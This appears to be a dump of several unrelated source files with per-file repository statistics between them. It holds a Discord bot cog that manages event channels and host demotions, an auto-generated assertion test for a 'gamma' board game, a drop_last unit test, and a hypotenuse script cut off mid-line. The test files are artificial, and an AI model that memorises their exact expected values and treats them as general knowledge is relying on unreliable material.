user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def karaoke(self, ctx) -> None:
""" Creates a Karaoke Night voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Karaoke Night`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
karaoke_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('KARAOKE_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Karaoke Club role
overwrites[karaoke_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎤 Karaoke Night 🎤",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎤 Karaoke Night 🎤",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def culture(self, ctx) -> None:
""" Creates a Culture Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Culture Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
culture_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('CULTURE_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Culture Club role
overwrites[culture_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎏 Culture Event 🎏",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎏 Culture Event 🎏",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def art(self, ctx) -> None:
""" Creates a Art Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create an `Art Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
art_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('ART_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Art Club role
overwrites[art_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎏 Art Event 🎏",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎏 Art Event 🎏",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def wellness(self, ctx) -> None:
""" Creates a Wellness Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Wellness Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
wellness_role = discord.utils.get(
guild.roles, id=int(os.getenv('WELLNESS_ROLE_ID', 123))
)
# Adds some perms to the Wellness role
overwrites[wellness_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🌺 Wellness Event 🌺",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🌺 Wellness Event 🌺",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def science(self, ctx) -> None:
""" Creates a Science Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Science Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
science_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('SCIENCE_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Science Club role
overwrites[science_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🦠 Science Event 🦠",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🦠 Science Event 🦠",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def reading(self, ctx) -> None:
""" Creates a Reading Session voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Reading Session`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
reading_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('READING_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Reading Club role
overwrites[reading_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎏 Reading Session 📖",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎏 Reading Session 📖",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def gaming(self, ctx) -> None:
""" Creates a Gaming Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Gaming Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
gamer_role = discord.utils.get(
guild.roles, id=int(os.getenv('GAMER_ROLE_ID', 123))
)
# Adds some perms to the Gamer role
overwrites[gamer_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎮 Gaming Event 🎮",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎮 Gaming Event 🎮",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def sport(self, ctx) -> None:
""" Creates a Sport Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Sport Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
sport_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('SPORT_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Sport Club role
overwrites[sport_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🏃 Sport Event 🏃",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🏃 Sport Event 🏃",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@commands.command(aliases=['close_event'])
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
async def delete_event(self, ctx) -> None:
""" Deletes an event room. """
member = ctx.author
perms = ctx.channel.permissions_for(member)
delete = False
if not (room := await self.get_event_room_by_txt_id(ctx.channel.id)):
return await ctx.send(f"**{member.mention}, this is not an event room, write this command in the event channel you created!**")
# Checks whether member can delete room
if room[0] == member.id: # If it's the owner of the room
delete = True
elif perms.administrator or mod_role_id in [r.id for r in member.roles]: # If it's a staff member
delete = True
if delete:
confirm = await ConfirmSkill(f"**{member.mention}, are you sure you want to delete the event rooms?**").prompt(ctx)
if confirm:
try:
await self.delete_event_room_by_txt_id(ctx.channel.id)
if (room_one := self.client.get_channel(room[1])):
await room_one.delete()
if (room_two := self.client.get_channel(room[2])):
await room_two.delete()
except Exception as e:
print(e)
await ctx.send(f"**Something went wrong with it, try again later, {member.mention}!**")
else:
await ctx.send(f"**Not deleting them, then, {member.mention}!**")
@commands.command(aliases=['dh'])
@utils.is_allowed([owner_role_id, admin_role_id, real_event_manager_role_id], throw_exc=True)
async def demote_host(self, ctx, member: discord.Member = None) -> None:
""" Demotes a teacher to a regular user.
:param member: The teacher that is gonna be demoted. """
if not member:
return await ctx.send("**Please, inform a member to demote to a regular user!**")
author: discord.Member = ctx.author
event_host = discord.utils.get(ctx.guild.roles, id=event_manager_role_id)
if event_host not in member.roles:
return await ctx.send(f"**{member.mention} is not even an Event Host!**")
try:
await member.remove_roles(event_host)
except Exception:
pass
# General log
demote_embed = discord.Embed(
title="__Event Host Demotion__",
description=f"{member.mention} has been demoted from an `Event Host` to `regular user` by {author.mention}",
color=discord.Color.dark_red(),
timestamp=ctx.message.created_at
)
await ctx.send(embed=demote_embed)
# Moderation log
if demote_log := discord.utils.get(ctx.guild.text_channels, id=int(os.getenv('PROMOTE_DEMOTE_LOG_ID', 123))):
demote_embed.set_author(name=member, icon_url=member.display_avatar)
demote_embed.set_footer(text=f"Demoted by {author}", icon_url=author.display_avatar)
await demote_log.send(embed=demote_embed)
try:
await member.send(f"**You have been demoted from an `Event Host` to a regular user!**")
except:
pass
def setup(client) -> None:
""" Cog's setup function. """
client.add_cog(EventManagement(client))
| 42.280125
| 139
| 0.628863
| 3,488
| 27,017
| 4.695241
| 0.069954
| 0.026012
| 0.031508
| 0.024608
| 0.820785
| 0.789949
| 0.787507
| 0.754228
| 0.746352
| 0.738963
| 0
| 0.006385
| 0.269571
| 27,017
| 638
| 140
| 42.346395
| 0.821678
| 0.047044
| 0
| 0.703463
| 0
| 0.004329
| 0.154096
| 0.020359
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004329
| false
| 0.004329
| 0.015152
| 0
| 0.071429
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b89a69279beb1e36b11ce465d01b093a1f3b8966
| 8,776
|
py
|
Python
|
z2/part2/interactive/jm/random_normal_1/534113920.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 1
|
2020-04-16T12:13:47.000Z
|
2020-04-16T12:13:47.000Z
|
z2/part2/interactive/jm/random_normal_1/534113920.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:50:15.000Z
|
2020-05-19T14:58:30.000Z
|
z2/part2/interactive/jm/random_normal_1/534113920.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:45:13.000Z
|
2020-06-09T19:18:31.000Z
|
from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 534113920
"""
"""
random actions, total chaos
"""
board = gamma_new(8, 7, 5, 8)
assert board is not None
assert gamma_move(board, 1, 1, 4) == 1
assert gamma_move(board, 1, 7, 1) == 1
assert gamma_move(board, 2, 0, 6) == 1
assert gamma_busy_fields(board, 2) == 1
assert gamma_move(board, 3, 0, 4) == 1
assert gamma_move(board, 4, 1, 0) == 1
assert gamma_move(board, 4, 4, 6) == 1
assert gamma_free_fields(board, 4) == 50
assert gamma_move(board, 5, 5, 6) == 1
assert gamma_move(board, 5, 7, 0) == 1
assert gamma_move(board, 1, 7, 3) == 1
assert gamma_move(board, 1, 0, 1) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 0, 4) == 0
assert gamma_move(board, 3, 5, 5) == 1
assert gamma_move(board, 3, 3, 4) == 1
assert gamma_free_fields(board, 3) == 44
assert gamma_move(board, 4, 5, 4) == 1
assert gamma_move(board, 5, 6, 1) == 1
assert gamma_move(board, 5, 1, 5) == 1
assert gamma_move(board, 1, 5, 6) == 0
assert gamma_move(board, 1, 6, 5) == 1
assert gamma_free_fields(board, 1) == 40
assert gamma_move(board, 2, 6, 0) == 1
board730595885 = gamma_board(board)
assert board730595885 is not None
assert board730595885 == ("2...45..\n"
".5...31.\n"
"31.3.4..\n"
".......1\n"
"........\n"
"1.....51\n"
".4....25\n")
del board730595885
board730595885 = None
assert gamma_move(board, 3, 1, 5) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_move(board, 4, 4, 7) == 0
assert gamma_move(board, 5, 0, 2) == 1
assert gamma_move(board, 5, 4, 2) == 1
assert gamma_free_fields(board, 5) == 37
assert gamma_move(board, 1, 1, 2) == 1
assert gamma_busy_fields(board, 1) == 6
assert gamma_free_fields(board, 1) == 36
assert gamma_move(board, 2, 1, 5) == 0
assert gamma_move(board, 2, 4, 0) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 2, 5) == 1
assert gamma_move(board, 3, 3, 5) == 1
assert gamma_move(board, 4, 1, 3) == 1
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 1, 4) == 0
assert gamma_move(board, 5, 2, 5) == 0
assert gamma_move(board, 1, 5, 4) == 0
assert gamma_move(board, 3, 5, 0) == 1
assert gamma_move(board, 3, 6, 3) == 1
assert gamma_golden_move(board, 3, 3, 1) == 0
assert gamma_move(board, 4, 3, 5) == 0
assert gamma_move(board, 4, 5, 4) == 0
assert gamma_move(board, 5, 0, 4) == 0
assert gamma_move(board, 1, 6, 5) == 0
assert gamma_move(board, 1, 7, 3) == 0
assert gamma_move(board, 2, 2, 5) == 0
assert gamma_move(board, 2, 4, 4) == 1
assert gamma_move(board, 3, 5, 4) == 0
assert gamma_move(board, 4, 2, 7) == 0
assert gamma_move(board, 4, 0, 0) == 1
assert gamma_busy_fields(board, 4) == 5
assert gamma_move(board, 5, 6, 1) == 0
assert gamma_move(board, 1, 4, 4) == 0
assert gamma_move(board, 1, 7, 4) == 1
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_move(board, 3, 3, 3) == 1
assert gamma_move(board, 3, 7, 3) == 0
assert gamma_move(board, 4, 7, 5) == 1
assert gamma_move(board, 5, 1, 5) == 0
assert gamma_golden_move(board, 5, 5, 5) == 1
board768066899 = gamma_board(board)
assert board768066899 is not None
assert board768066899 == ("2...45..\n"
".533.514\n"
"31.324.1\n"
"24.3..31\n"
"51..5...\n"
"1.....51\n"
"44..2325\n")
del board768066899
board768066899 = None
assert gamma_move(board, 1, 3, 2) == 1
assert gamma_move(board, 1, 6, 3) == 0
assert gamma_busy_fields(board, 1) == 8
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_move(board, 2, 3, 4) == 0
assert gamma_busy_fields(board, 2) == 5
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 1, 4) == 0
assert gamma_move(board, 3, 3, 1) == 1
assert gamma_move(board, 4, 6, 1) == 0
assert gamma_move(board, 4, 0, 1) == 0
assert gamma_move(board, 5, 1, 4) == 0
assert gamma_move(board, 3, 1, 2) == 0
assert gamma_move(board, 4, 6, 4) == 1
assert gamma_move(board, 4, 5, 4) == 0
assert gamma_busy_fields(board, 4) == 7
assert gamma_free_fields(board, 5) == 21
assert gamma_move(board, 1, 6, 2) == 1
assert gamma_busy_fields(board, 1) == 9
assert gamma_move(board, 2, 2, 1) == 1
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_free_fields(board, 3) == 19
assert gamma_move(board, 4, 0, 1) == 0
assert gamma_free_fields(board, 4) == 19
assert gamma_move(board, 5, 0, 3) == 0
board589089307 = gamma_board(board)
assert board589089307 is not None
assert board589089307 == ("2...45..\n"
".533.514\n"
"31.32441\n"
"24.3..31\n"
"51.15.1.\n"
"1.23..51\n"
"44..2325\n")
del board589089307
board589089307 = None
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 1, 7, 1) == 0
assert gamma_move(board, 2, 6, 7) == 0
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_move(board, 4, 0, 3) == 0
assert gamma_move(board, 5, 1, 5) == 0
assert gamma_move(board, 1, 2, 2) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 7, 1) == 0
assert gamma_move(board, 3, 2, 3) == 1
assert gamma_move(board, 4, 7, 0) == 0
assert gamma_move(board, 4, 2, 5) == 0
assert gamma_move(board, 5, 6, 2) == 0
assert gamma_golden_possible(board, 5) == 0
assert gamma_move(board, 1, 6, 2) == 0
assert gamma_golden_move(board, 1, 3, 6) == 0
assert gamma_move(board, 2, 0, 2) == 0
assert gamma_move(board, 3, 0, 6) == 0
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_golden_move(board, 3, 6, 5) == 1
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_move(board, 4, 3, 2) == 0
assert gamma_move(board, 5, 6, 7) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 6, 4) == 0
assert gamma_busy_fields(board, 1) == 9
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 3, 4, 2) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_move(board, 4, 0, 3) == 0
assert gamma_move(board, 5, 5, 1) == 1
assert gamma_move(board, 1, 0, 2) == 0
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 6, 6) == 1
assert gamma_move(board, 4, 6, 2) == 0
assert gamma_move(board, 4, 5, 1) == 0
assert gamma_busy_fields(board, 4) == 7
assert gamma_move(board, 5, 6, 2) == 0
assert gamma_move(board, 5, 5, 5) == 0
assert gamma_free_fields(board, 5) == 15
assert gamma_move(board, 1, 0, 2) == 0
assert gamma_move(board, 1, 4, 5) == 1
assert gamma_move(board, 2, 5, 2) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 5, 0) == 0
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_busy_fields(board, 4) == 7
assert gamma_move(board, 5, 4, 2) == 0
assert gamma_move(board, 1, 4, 0) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 3, 6, 3) == 0
assert gamma_free_fields(board, 3) == 13
assert gamma_move(board, 4, 1, 1) == 1
assert gamma_free_fields(board, 4) == 12
assert gamma_move(board, 5, 2, 1) == 0
assert gamma_move(board, 1, 6, 3) == 0
assert gamma_move(board, 1, 3, 3) == 0
assert gamma_move(board, 2, 1, 3) == 0
assert gamma_golden_move(board, 2, 6, 5) == 1
assert gamma_move(board, 3, 7, 6) == 1
assert gamma_golden_move(board, 3, 6, 4) == 0
assert gamma_move(board, 4, 2, 5) == 0
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_move(board, 5, 6, 5) == 0
assert gamma_move(board, 5, 7, 5) == 0
assert gamma_move(board, 1, 0, 0) == 0
assert gamma_move(board, 2, 3, 0) == 1
assert gamma_move(board, 3, 0, 4) == 0
assert gamma_free_fields(board, 3) == 10
assert gamma_move(board, 4, 2, 7) == 0
assert gamma_move(board, 4, 2, 1) == 0
assert gamma_move(board, 5, 5, 0) == 0
assert gamma_move(board, 1, 3, 4) == 0
assert gamma_move(board, 1, 3, 6) == 1
assert gamma_move(board, 2, 0, 0) == 0
assert gamma_move(board, 3, 7, 0) == 0
assert gamma_move(board, 4, 3, 4) == 0
assert gamma_move(board, 5, 4, 2) == 0
assert gamma_move(board, 5, 5, 6) == 0
assert gamma_move(board, 2, 2, 7) == 0
assert gamma_golden_move(board, 2, 2, 0) == 0
assert gamma_move(board, 3, 2, 1) == 0
assert gamma_golden_possible(board, 3) == 0
assert gamma_move(board, 4, 1, 4) == 0
assert gamma_move(board, 5, 6, 4) == 0
assert gamma_move(board, 5, 6, 6) == 0
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 6, 2) == 0
assert gamma_move(board, 3, 0, 0) == 0
assert gamma_move(board, 4, 0, 2) == 0
assert gamma_golden_possible(board, 4) == 1
assert gamma_move(board, 5, 0, 6) == 0
assert gamma_move(board, 1, 1, 2) == 0
assert gamma_move(board, 2, 6, 2) == 0
assert gamma_free_fields(board, 2) == 6
gamma_delete(board)
| 34.415686
| 46
| 0.64984
| 1,654
| 8,776
| 3.298065
| 0.037485
| 0.383135
| 0.415215
| 0.553621
| 0.883776
| 0.880477
| 0.768836
| 0.486159
| 0.36462
| 0.36462
| 0
| 0.131502
| 0.182885
| 8,776
| 254
| 47
| 34.551181
| 0.629201
| 0
| 0
| 0.254237
| 0
| 0
| 0.024171
| 0
| 0
| 0
| 0
| 0
| 0.834746
| 1
| 0
| false
| 0
| 0.004237
| 0
| 0.004237
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8ae272b00c0cc898806d7f041057bf332d328e3
| 268
|
py
|
Python
|
ramda/drop_last_test.py
|
Rafi993/pyramda
|
4fa7fe28d5eaa798b702d28bdd3948515cb88f48
|
[
"MIT"
] | 1
|
2018-08-05T04:41:14.000Z
|
2018-08-05T04:41:14.000Z
|
ramda/drop_last_test.py
|
Rafi993/pyramda
|
4fa7fe28d5eaa798b702d28bdd3948515cb88f48
|
[
"MIT"
] | 3
|
2018-06-12T18:42:05.000Z
|
2018-07-23T11:50:25.000Z
|
ramda/drop_last_test.py
|
slavaGanzin/pyramda
|
4fa7fe28d5eaa798b702d28bdd3948515cb88f48
|
[
"MIT"
] | null | null | null |
from .drop_last import drop_last
from ramda.private.asserts import assert_iterables_equal
def drop_nocurry_test():
assert_iterables_equal(drop_last(2, [1, 2, 3, 4]), [1, 2])
def drop_curry_test():
assert_iterables_equal(drop_last(2)([1, 2, 3, 4]), [1, 2])
| 24.363636
| 62
| 0.720149
| 46
| 268
| 3.891304
| 0.391304
| 0.178771
| 0.335196
| 0.268156
| 0.435754
| 0.435754
| 0.435754
| 0.435754
| 0.435754
| 0.435754
| 0
| 0.060606
| 0.13806
| 268
| 10
| 63
| 26.8
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b240394b07c6a2b8d77b42bd10772d8393841dba
| 561
|
py
|
Python
|
curso python/exercicios/mundo-1/ex015/catetoehipotenusa.py
|
lucasrenandns/Python-3
|
284b93a5538b3978d57593b5a664b1d2d98c6e1a
|
[
"MIT"
] | 1
|
2022-02-09T19:05:05.000Z
|
2022-02-09T19:05:05.000Z
|
curso python/exercicios/mundo-1/ex015/catetoehipotenusa.py
|
lucasrenandns/Python-3
|
284b93a5538b3978d57593b5a664b1d2d98c6e1a
|
[
"MIT"
] | null | null | null |
curso python/exercicios/mundo-1/ex015/catetoehipotenusa.py
|
lucasrenandns/Python-3
|
284b93a5538b3978d57593b5a664b1d2d98c6e1a
|
[
"MIT"
] | null | null | null |
from math import hypot
co = float(input("Digite o cateto oposto: "))
ca = float(input("Digite o cateto adjacente: "))
hi = hypot(co, ca)
print("A hipotenusa vai medir {:.2f}".format(hi))
'''co = float(input("Digite o cateto oposto: "))
